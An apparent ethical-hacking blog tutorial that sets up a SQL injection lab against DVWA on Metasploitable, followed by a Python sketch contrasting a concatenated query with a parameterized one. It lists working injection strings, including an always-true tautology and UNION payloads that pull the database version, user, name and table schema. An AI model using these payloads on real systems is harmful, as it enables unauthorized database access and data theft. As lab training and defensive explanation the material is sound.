
SQL injection lab PT.1 – Intro/Lab setup – HC NEPAL


Hello Gurkhas!!!

By: Bijay Acharya | Add him on Facebook here > https://www.facebook.com/nhcbijay.ach | Follow him on Twitter: @acharya_bijay | Subscribe to his tutorial channel for ethical hacking videos (in Nepali) here > Student Video Tutorial

In this lab, we'll begin a series on SQL injection. It will be a part-by-part article/guide on SQL injection.

  • Let's start with the lab setup:
    > Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.
    > Check the IP address of both devices.
  • Step-by-step instructions
    1. Open Kali Linux (or BT 5r3)
    2. Open your browser and go to http://<IP address of Metasploitable>/dvwa/login.php
    3. Log in with user name "admin" and password "password"
    4. Click on DVWA Security, set it to low, then submit
    5. Click on manual SQL injection
    6. In the User ID box, type 1 and submit
    (PHP select statement: $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";)
    7. In the User ID box, type: %' or '0'='0
    (mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';)
    8. Get DB version: %' or 0=0 union select null, version() #
    9. Get DB user: %' or 0=0 union select null, user() #
    10. Get DB name: %' or 0=0 union select null, database() #
    11. Get schema information: %' and 1=0 union select null, table_name from information_schema.tables #
  • MORE here > http://lab.hcnepal.com/2016/08/24/sql-injection-lab-pt-1-introlab-setup-hc-nepal/
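
Why the input in step 7 returns every row, and what stops it: the sketch below is an added example, not code from the original post or from DVWA. It rebuilds the SELECT statement from step 6 once by string concatenation and once with a bound parameter. Assumptions: an in-memory SQLite database stands in for the lab's MySQL, and the table rows and function names are constructed for illustration.

```python
import sqlite3

# Input from step 7 of the lab, exactly as typed into the User ID box.
STEP7_INPUT = "%' or '0'='0"

def make_db():
    # Constructed sample data; SQLite stands in for the lab's MySQL database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("1", "Asha", "Rai"), ("2", "Binod", "Thapa"), ("3", "Chandra", "Gurung")],
    )
    return db

def lookup_concatenated(db, user_id):
    # Same construction as the PHP statement in step 6: the input is pasted
    # into the SQL text, so a quote in the input ends the string literal.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # The input is bound as a value; it is compared as one string and its
    # quote characters never become SQL syntax.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def lookup_validated(db, user_id):
    # Defence in depth: the ID is numeric in this lab, so reject anything else
    # before the query runs at all.
    if not user_id.isdigit():
        raise ValueError("user_id must be numeric")
    return lookup_parameterized(db, user_id)

if __name__ == "__main__":
    db = make_db()
    print("concatenated, id 1:     ", lookup_concatenated(db, "1"))
    print("concatenated, step 7:   ", lookup_concatenated(db, STEP7_INPUT))
    print("parameterized, step 7:  ", lookup_parameterized(db, STEP7_INPUT))
```

With concatenation the WHERE clause becomes user_id = '%' or '0'='0', which is true for every row; with the bound parameter the same input matches no user_id and nothing is returned.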
